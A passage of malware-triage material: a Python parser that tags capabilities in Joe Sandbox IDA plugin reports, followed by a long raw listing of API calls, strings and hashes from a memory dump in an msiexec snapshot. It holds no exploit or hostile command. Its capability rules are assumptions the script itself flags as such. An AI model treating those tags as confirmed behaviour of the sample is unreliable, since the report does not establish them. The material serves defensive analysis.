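    apis: list = field(default_factory=list)        # direct calls: (api, module, ref address)
    subcalls: list = field(default_factory=list)    # (callee address, api, module)
    strings: list = field(default_factory=list)     # Strings section: (text, xref address)
    similarity: dict = field(default_factory=dict)  # "API ID", "String ID", "API String ID", ...

    @property
    def string_ids(self):  # the report joins a function's strings with '$' in String ID
        return [s for s in self.similarity.get("String ID", "").split("$") if s]


def parse_blocks(text):
    blocks, section, cur = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line in SECTIONS:  # each 'APIs' header opens the next function's block
            if line == "APIs":
                cur = FunctionBlock()
                blocks.append(cur)
            section = line
            continue
        if cur is None or not line:
            continue
        if section == "APIs":
            if m := SUBCALL.match(line):
                cur.subcalls.append((m["fn"], m["api"], m["mod"]))
            elif m := API_CALL.match(line):
                cur.apis.append((m["api"], m["mod"], line.rsplit("ref: ", 1)[-1]))
        elif section == "Strings":
            if m := STRING_LINE.match(line):
                cur.strings.append((m["text"], m["xref"]))
        elif section == "Similarity":
            if m := SIM_FIELD.match(line):
                cur.similarity[m["key"]] = m["val"].strip()
    return blocks


# Assumed capability rules keyed on API names and strings that occur in this listing.
# The SQLite rule assumes the quoted text is an SQLite error message; the report does not say so.
CAPABILITY_RULES = {
    "registry value enumeration": ({"RegEnumValueW", "RegEnumKeyExW"}, set()),
    "browser history lookup": (set(), {"History"}),
    "PE version-info query": (set(), {"\\StringFileInfo\\"}),
    "SQLite error strings": (set(), {'unknown column "%s" in foreign key definition'}),
}


def classify(block):
    apis = {a for a, _, _ in block.apis} | {a for _, a, _ in block.subcalls}
    strings = set(block.string_ids) | {t for t, _ in block.strings}
    return {name for name, (api_set, str_set) in CAPABILITY_RULES.items()
            if apis & api_set or strings & str_set}


def triage(text):
    return [{"block": i, "apis": sorted({a for a, _, _ in b.apis}),
             "strings": b.string_ids, "capabilities": sorted(classify(b))}
            for i, b in enumerate(parse_blocks(text))]
```

Two caveats when running this over a full report: the `$` separator in String ID is the report's own convention, so a string that itself contains `$` splits wrongly (the Strings section, with its per-string xrefs, is the authoritative copy when present), and every block in this listing carries the same Source File and Snapshot File (the dump at base 00400000 in the msiexec snapshot), so filter on those fields before comparing functions when a report mixes several dumps.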
                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 0044A6EB
                                                                                            • memset.MSVCRT ref: 0044A6FB
                                                                                            • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                                            • memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcpymemset
                                                                                            • String ID: gj
                                                                                            • API String ID: 1297977491-4203073231
                                                                                            • Opcode ID: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                                                            • Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
                                                                                            • Opcode Fuzzy Hash: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                                                            • Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756
                                                                                            APIs
                                                                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                                                                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                                                                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                                                                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                                                                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E961
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E974
                                                                                            • ??3@YAXPAX@Z.MSVCRT(00000001,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E987
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E99A
                                                                                            • free.MSVCRT ref: 0040E9D3
                                                                                              • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: ??3@$free
                                                                                            • String ID:
                                                                                            • API String ID: 2241099983-0
                                                                                            • Opcode ID: 2f3d1febb6567f1c65e15d924abe411323abe179da33a997404dc77986320892
                                                                                            • Instruction ID: 098569c1990a85f87ddbd530571c52e66e2f7ba0f471894b996c1416d461d1fd
                                                                                            • Opcode Fuzzy Hash: 2f3d1febb6567f1c65e15d924abe411323abe179da33a997404dc77986320892
                                                                                            • Instruction Fuzzy Hash: 5001A932A01A2097C665BB27A50195EB354BE86B24316896FF844773C1CB3C6C61C6DF
                                                                                            APIs
                                                                                            • AreFileApisANSI.KERNEL32 ref: 00417497
                                                                                            • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                                                                                            • malloc.MSVCRT ref: 004174BD
                                                                                            • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                                                                                            • free.MSVCRT ref: 004174E4
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: ByteCharMultiWide$ApisFilefreemalloc
                                                                                            • String ID:
                                                                                            • API String ID: 4053608372-0
                                                                                            • Opcode ID: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                                                                            • Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
                                                                                            • Opcode Fuzzy Hash: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                                                                            • Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
                                                                                            APIs
                                                                                            • GetParent.USER32(?), ref: 0040D453
                                                                                            • GetWindowRect.USER32(?,?), ref: 0040D460
                                                                                            • GetClientRect.USER32(00000000,?), ref: 0040D46B
                                                                                            • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                                                                                            • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$Rect$ClientParentPoints
                                                                                            • String ID:
                                                                                            • API String ID: 4247780290-0
                                                                                            • Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                            • Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
                                                                                            • Opcode Fuzzy Hash: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                            • Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5
                                                                                            APIs
                                                                                              • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                            • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                            • ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                                                                            • memset.MSVCRT ref: 004450CD
                                                                                              • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                            • ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                                              • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                                                                                              • Part of subcall function 00444E84: memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                                                              • Part of subcall function 00444E84: memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                                                              • Part of subcall function 00444E84: memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                                                            • CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                                                                            • String ID:
                                                                                            • API String ID: 1471605966-0
                                                                                            • Opcode ID: 1d83234f6ed1c703cc9b29937d58b4133add7b8d770e5fab418e64e17a94a812
                                                                                            • Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
                                                                                            • Opcode Fuzzy Hash: 1d83234f6ed1c703cc9b29937d58b4133add7b8d770e5fab418e64e17a94a812
                                                                                            • Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD
                                                                                            APIs
                                                                                            • wcscpy.MSVCRT ref: 0044475F
                                                                                            • wcscat.MSVCRT ref: 0044476E
                                                                                            • wcscat.MSVCRT ref: 0044477F
                                                                                            • wcscat.MSVCRT ref: 0044478E
                                                                                              • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                              • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                              • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?,004447CD,?,?,?,00000000,?), ref: 00409AA5
                                                                                              • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                                                                                            • String ID: \StringFileInfo\
                                                                                            • API String ID: 102104167-2245444037
                                                                                            • Opcode ID: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                                                            • Instruction ID: e4f437c51a7ffcfb72b972a214432876dbdec8abc2c75880463b8380eb377783
                                                                                            • Opcode Fuzzy Hash: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                                                            • Instruction Fuzzy Hash: 41018FB290021DB6EF10EAA1DC45EDF73BCAB05304F0004B7B514F2052EE38DB969B69
                                                                                            APIs
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: ??3@
                                                                                            • String ID:
                                                                                            • API String ID: 613200358-0
                                                                                            • Opcode ID: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                                            • Instruction ID: 8b058f36177a858601f18eb469b8e3bd7c1df3fc7b9e847ab044313c89d6339d
                                                                                            • Opcode Fuzzy Hash: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                                            • Instruction Fuzzy Hash: 98F012B25047015FD760AF6AA8C491BF3E9AB597147668C3FF149D3641CB38FC508A1C
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: _memicmpwcslen
                                                                                            • String ID: @@@@$History
                                                                                            • API String ID: 1872909662-685208920
                                                                                            • Opcode ID: 3ad5d2c3b3ee2b52e24687d5059668d8296d000cbab4a3a90200832106c23410
                                                                                            • Instruction ID: 0314511eba11a06c501d0b319d6753a7178557fc2485e08f734f24cb460fdfed
                                                                                            • Opcode Fuzzy Hash: 3ad5d2c3b3ee2b52e24687d5059668d8296d000cbab4a3a90200832106c23410
                                                                                            • Instruction Fuzzy Hash: F1F0CD3310471157D210DE199C41A2BF7F8DB813A5F11063FF991A31C2D739EC658657
                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 004100FB
                                                                                            • memset.MSVCRT ref: 00410112
                                                                                              • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                              • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                            • _snwprintf.MSVCRT ref: 00410141
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: memset$_snwprintf_wcslwrwcscpy
                                                                                            • String ID: </%s>
                                                                                            • API String ID: 3400436232-259020660
                                                                                            • Opcode ID: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                                                            • Instruction ID: d6b380c41b5e3e458bf6abeca455f552dea24a705517b0a2e3702c553642f250
                                                                                            • Opcode Fuzzy Hash: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                                                            • Instruction Fuzzy Hash: 9B01DBF3D0012977D730A755CC46FEA76ACEF45304F0000B6BB08B3186DB78DA458A99
                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 0040D58D
                                                                                            • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                                                                                            • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: ChildEnumTextWindowWindowsmemset
                                                                                            • String ID: caption
                                                                                            • API String ID: 1523050162-4135340389
                                                                                            • Opcode ID: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                                                                            • Instruction ID: dcfab03f3ae0740f4c11e1fd8af26e22289cdce227bdcda27870e2dbaf68b2c3
                                                                                            • Opcode Fuzzy Hash: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                                                                            • Instruction Fuzzy Hash: 50F08131D0031876FB206B95CC4EB8A3268AB04744F000076BE04B61D2DBB8EA44C69D
                                                                                            APIs
                                                                                              • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                                                                                              • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                                                                                            • CreateFontIndirectW.GDI32(?), ref: 00401156
                                                                                            • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                                                                                            • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                                                                            • String ID: MS Sans Serif
                                                                                            • API String ID: 210187428-168460110
                                                                                            • Opcode ID: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                                                            • Instruction ID: 44e142790c58e2983bb51e892a2c7280827b5342727586ee11fe1c2be2fb852b
                                                                                            • Opcode Fuzzy Hash: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                                                            • Instruction Fuzzy Hash: 7CF082B5A4030877EB326BA1DC46F9A77BDBB44B01F040935F721B91D1D3F4A585C658
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: ClassName_wcsicmpmemset
                                                                                            • String ID: edit
                                                                                            • API String ID: 2747424523-2167791130
                                                                                            • Opcode ID: 966ba6659df31be0b994ff47204b898d343df69b3f9d85cbf29a1f53eef5b26a
                                                                                            • Instruction ID: aa36152fd255268de381ae2120198bffa1fffac517830ea88c39a2b7b5867ff0
                                                                                            • Opcode Fuzzy Hash: 966ba6659df31be0b994ff47204b898d343df69b3f9d85cbf29a1f53eef5b26a
                                                                                            • Instruction Fuzzy Hash: 86E0D872D8031E6AFB10EBA0DC4AFA977BCFB01708F0001B6B915E10C2EBB496494A45
                                                                                            APIs
                                                                                              • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                              • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                              • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                              • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                            • GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 00414E2B
                                                                                            • FreeLibrary.KERNEL32(00000000,?,00405751,00000000), ref: 00414E43
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                            • String ID: SHAutoComplete$shlwapi.dll
                                                                                            • API String ID: 3150196962-1506664499
                                                                                            • Opcode ID: cdcb965da711456ca4b51fb43941328c5d6cb5423f9048b51d1f1fd4f659d43f
                                                                                            • Instruction ID: 56be8aed7d941f739c6f69dc747e21d8edf2639efa9d7e462eda1ee05908af23
                                                                                            • Opcode Fuzzy Hash: cdcb965da711456ca4b51fb43941328c5d6cb5423f9048b51d1f1fd4f659d43f
                                                                                            • Instruction Fuzzy Hash: C1D0C2353002315BD6616B27AC04AAF2A99EFC13A1B054035F928D2210DBA84996827D
                                                                                            APIs
                                                                                            • memcpy.MSVCRT(?,00000000,00000030,00000000), ref: 0041D8A6
                                                                                            • memcpy.MSVCRT(?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8BC
                                                                                            • memcmp.MSVCRT(?,?,00000030,?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8CB
                                                                                            • memcmp.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,00000000), ref: 0041D913
                                                                                            • memcpy.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041D92E
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcpy$memcmp
                                                                                            • String ID:
                                                                                            • API String ID: 3384217055-0
                                                                                            • Opcode ID: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                                            • Instruction ID: f5df6941464580ef2fdae31f27b7f31021858bb2d0e37ec30fcb1df3a02010a9
                                                                                            • Opcode Fuzzy Hash: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                                            • Instruction Fuzzy Hash: 8821B2B2E10249ABDB14EA91DC46EDF73FC9B44704F01442AF512D7181EB28E644C725
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: memset$memcpy
                                                                                            • String ID:
                                                                                            • API String ID: 368790112-0
                                                                                            • Opcode ID: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                                                                                            • Instruction ID: abb90bdd0bd5c960a46cc99acd1c91865272cbbdb433919b32c204757dd19146
                                                                                            • Opcode Fuzzy Hash: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                                                                                            • Instruction Fuzzy Hash: 0201FCB5740B007BF235AB35CC03F9A73A8AF52724F004A1EF153966C2DBF8A554819D
                                                                                            APIs
                                                                                              • Part of subcall function 004019D8: GetMenu.USER32(?), ref: 004019F6
                                                                                              • Part of subcall function 004019D8: GetSubMenu.USER32(00000000), ref: 004019FD
                                                                                              • Part of subcall function 004019D8: EnableMenuItem.USER32(?,?,00000000), ref: 00401A15
                                                                                              • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000412,?,00000000), ref: 00401A36
                                                                                              • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000411,?,?), ref: 00401A5A
                                                                                            • GetMenu.USER32(?), ref: 00410F8D
                                                                                            • GetSubMenu.USER32(00000000), ref: 00410F9A
                                                                                            • GetSubMenu.USER32(00000000), ref: 00410F9D
                                                                                            • CheckMenuRadioItem.USER32(00000000,0000B284,0000B287,?,00000000), ref: 00410FA9
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: Menu$ItemMessageSend$CheckEnableRadio
                                                                                            • String ID:
                                                                                            • API String ID: 1889144086-0
                                                                                            • Opcode ID: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                                                                            • Instruction ID: be5000c07a60ff25a23af51018491178d5f127676f18bd69b4cc56e9e4830f27
                                                                                            • Opcode Fuzzy Hash: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                                                                            • Instruction Fuzzy Hash: D5517171B40704BFEB20AB66CD4AF9FBAB9EB44704F00046EB249B72E2C6756D50DB54
                                                                                            APIs
                                                                                            • CreateFileMappingW.KERNEL32(?,00000000,00000004,00000000,?,00000000), ref: 004180B8
                                                                                            • MapViewOfFile.KERNEL32(00000000,00000006,00000000,?,?), ref: 004180E3
                                                                                            • GetLastError.KERNEL32 ref: 0041810A
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00418120
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$CloseCreateErrorHandleLastMappingView
                                                                                            • String ID:
                                                                                            • API String ID: 1661045500-0
                                                                                            • Opcode ID: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                                                                            • Instruction ID: 5cb71d9443798353a032a6b226e7c46d85178154149a60e532078a3cdb21b7c8
                                                                                            • Opcode Fuzzy Hash: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                                                                            • Instruction Fuzzy Hash: 64518A71204706DFDB24CF25C984AA7BBE5FF88344F10492EF84287691EB74E895CB99
                                                                                            APIs
                                                                                              • Part of subcall function 00415A91: memset.MSVCRT ref: 00415AAB
                                                                                            • memcpy.MSVCRT(?,?,?), ref: 0042EC7A
                                                                                            Strings
                                                                                            • sqlite_altertab_%s, xrefs: 0042EC4C
                                                                                            • virtual tables may not be altered, xrefs: 0042EBD2
                                                                                            • Cannot add a column to a view, xrefs: 0042EBE8
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcpymemset
                                                                                            • String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
                                                                                            • API String ID: 1297977491-2063813899
                                                                                            • Opcode ID: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                                                            • Instruction ID: f910cd7a27c7e389b2617bf4251edf561ae6288f62f29054cc1fb9bea0934792
                                                                                            • Opcode Fuzzy Hash: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                                                            • Instruction Fuzzy Hash: 1E418E75A00615EFCB04DF5AD881A99BBF0FF48314F65816BE808DB352D778E950CB88
                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 0040560C
                                                                                              • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                              • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                              • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                              • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                              • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                              • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                              • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                              • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                              • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                              • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                              • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                              • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                              • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
